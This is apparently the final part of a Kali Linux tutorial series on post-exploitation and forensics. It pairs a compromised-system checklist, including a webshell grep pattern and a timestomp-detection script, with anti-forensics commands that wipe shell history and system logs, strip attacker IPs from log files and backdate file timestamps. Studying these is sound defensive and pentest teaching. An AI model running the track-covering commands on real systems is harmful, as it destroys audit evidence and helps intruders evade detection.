| journalctl -u ssh | Show SSH service logs |
| journalctl -p err | Show error-level logs |
| journalctl --since "1 hour ago" | Show logs from the last hour |
| journalctl --since "2024-01-01" --until "2024-01-02" | Show logs for a specific time range |
| journalctl -n 100 | Show the last 100 lines |
| journalctl _UID=1000 | Logs for a specific UID |

🚨 Compromised System Checklist

# === Checklist for identifying a compromised system ===
# 1. Unusual processes
target$ ps auxf                                                  # Suspicious processes
target$ ps aux | grep -v "^root\|^www-data\|^systemd"
# 2. Network connections
target$ ss -tulnp                                                # Unknown listening ports
target$ ss -tp | grep ESTABLISHED                                # Established connections
target$ netstat -ano | grep -v "127.0.0.1"
# 3. Recently modified files
target$ find / -mtime -1 -type f 2>/dev/null | grep -v proc
target$ find /var/www /tmp /dev/shm -type f -mtime -7 2>/dev/null
# 4. Suspicious files in temp locations
target$ ls -la /tmp/ /var/tmp/ /dev/shm/
# 5. Crontab anomalies
target$ cat /etc/crontab && ls /etc/cron*
target$ for user in $(cut -f1 -d: /etc/passwd); do echo $user; crontab -u $user -l 2>/dev/null; done
# 6. New user accounts
target$ awk -F: '$3 >= 1000 {print}' /etc/passwd
target$ grep -v "^#" /etc/sudoers
# 7. SUID files (newly added)
target$ find / -perm -4000 -newer /etc/passwd 2>/dev/null
# 8. Look for webshells
target$ find /var/www -name "*.php" -newer /var/www/index.php 2>/dev/null
target$ grep -rn "system\|exec\|shell_exec\|passthru\|eval\|base64_decode" /var/www/ 2>/dev/null
# 9. Rootkit check
root@kali:~# rkhunter --check --skip-keypress
root@kali:~# chkrootkit
# 10. Open files
target$ lsof -i 4 -n -P | grep LISTEN                             # Listening services
target$ lsof +D /tmp                                              # Files open under /tmp
CHAPTER 08
🧹 Covering Tracks — Remove Your Presence
Log clearing, history deletion, timestamp modification — both attackers and defenders need to know this
⚠️ Authorized Environments Only
These techniques are only for Penetration Testing or CTF. As a defender you need to know them, because understanding what an attacker can do lets you protect systems better.

🗑️ Clear History & Logs

# Disable bash history (at the start of the session)
target$ unset HISTFILE
target$ export HISTSIZE=0
target$ export HISTFILESIZE=0
# Delete the history file
target$ history -c && history -w
target$ cat /dev/null > ~/.bash_history
target$ rm -f ~/.bash_history
# Keep the current session's history from being written
target$ export HISTFILE=/dev/null
# Clear auth logs (needs root)
target$ cat /dev/null > /var/log/auth.log
target$ cat /dev/null > /var/log/syslog
# Remove specific entries
target$ sed -i '/192.168.1.100/d' /var/log/auth.log
target$ sed -i '/attacker_ip/d' /var/log/apache2/access.log
# Clear lastlog, wtmp, btmp
target$ cat /dev/null > /var/log/wtmp
target$ cat /dev/null > /var/log/btmp
# Clear journalctl logs
target$ journalctl --rotate && journalctl --vacuum-time=1s

⏱️ Modify File Timestamps

# Set a file's timestamp back to an earlier date
target$ touch -t 202301011200 /tmp/malware.sh    # Jan 1, 2023, 12:00
# Copy another file's timestamp
target$ touch -r /etc/passwd /tmp/suspicious_file
# Set access and modify time separately
target$ touch -a -t 202301010000 file            # Access time
target$ touch -m -t 202301010000 file            # Modify time
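What the defender sees after the touch commands above, as an added example that is not part of the original page: touch -t and touch -r only rewrite atime and mtime, while ctime is set by the kernel on every inode change and cannot be put in the past from userland, so a file whose mtime is far older than its ctime is a timestomping indicator. The sample directory is constructed and function names are hypothetical; the gap check assumes GNU or BSD stat.

```shell
#!/bin/sh
# Added example, not from the original page: detect backdated files by comparing
# ctime with mtime. Sample data is constructed; function names are hypothetical.

# Print ctime minus mtime in seconds for $1 (GNU stat first, BSD/macOS stat as fallback).
ctime_mtime_gap() {
    if stat -c %Z "$1" >/dev/null 2>&1; then
        ctime=$(stat -c %Z "$1"); mtime=$(stat -c %Y "$1")    # GNU coreutils
    else
        ctime=$(stat -f %c "$1"); mtime=$(stat -f %m "$1")    # BSD / macOS
    fi
    echo $((ctime - mtime))
}

# List regular files under $1 whose mtime predates ctime by more than $2 seconds
# (default one day). A genuine edit leaves the two within seconds of each other;
# only a manipulated mtime (or a restore from an archive) opens a large gap.
find_backdated() {
    threshold=${2:-86400}
    find "$1" -type f | while read -r f; do
        gap=$(ctime_mtime_gap "$f")
        if [ "$gap" -gt "$threshold" ]; then
            echo "BACKDATED $f (mtime is ${gap}s older than ctime)"
        fi
    done
}

# Build a sample directory: one normal file, one file backdated exactly as in the text.
build_sample_dir() {
    d=$(mktemp -d)
    printf 'meeting notes\n' > "$d/notes.txt"
    printf '#!/bin/sh\necho placeholder\n' > "$d/.cache.sh"
    touch -t 202301011200 "$d/.cache.sh"      # Jan 1, 2023, 12:00 (the command from the text)
    echo "$d"
}

# Demo on the constructed directory (on a real host: find_backdated /tmp or /var/www).
d=$(build_sample_dir)
find_backdated "$d"
rm -rf "$d"
```

Because ctime also changes on chmod, chown and rename, a flagged file is a lead to examine alongside the logs, not proof by itself.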

🔒 Remove Persistence

# Remove cron jobs
target$ crontab -r                    # Current user's crontab
target$ crontab -u root -r            # Root's crontab
# Delete dropped files
target$ shred -zu /tmp/payload.sh     # Secure delete (overwrite)
target$ rm -rf /tmp/.hidden_folder/
# Remove the key from SSH authorized_keys
target$ sed -i '/attacker_key/d' ~/.ssh/authorized_keys
# Remove the added user
target$ userdel -r backdoor_user

🔬 Post-Exploitation & Forensics — Key Points

  • 🐛 LinPEAS/WinPEAS: Run it as soon as you have a shell — it finds the PrivEsc vectors
  • ⬆️ PrivEsc Order: Sudo → SUID → Cron → PATH → Capabilities → Kernel
  • 🚇 Pivoting: The Chisel SOCKS proxy is the most reliable way to reach internal networks
  • 🧠 Memory Forensics: With a RAM dump, run pslist, psscan, netstat, malfind first
  • 💽 Disk Forensics: Verify the MD5 after imaging — preserve the chain of custody
  • 📋 Logs: Check /var/log/auth.log and the web logs first — that is where the attacker's footprints are

🎉 Kali Linux Series — Complete!

All parts of the series have been completed.

✅ Part 1 — Basic Commands + Recon
✅ Part 2 — Web Hacking Tools
✅ Part 3 — Exploitation Tools
✅ Part 4 — Password + Wireless
✅ Part 5 — Post-Exploitation + Forensics

🐧 "The best security professional is the one who thinks like an attacker and defends like a guardian."

Practice everything in an authorized environment only. Attacking any system without permission is completely illegal.

Kali Linux Series — Part 5 | v1.0 | Post-Exploitation & Forensics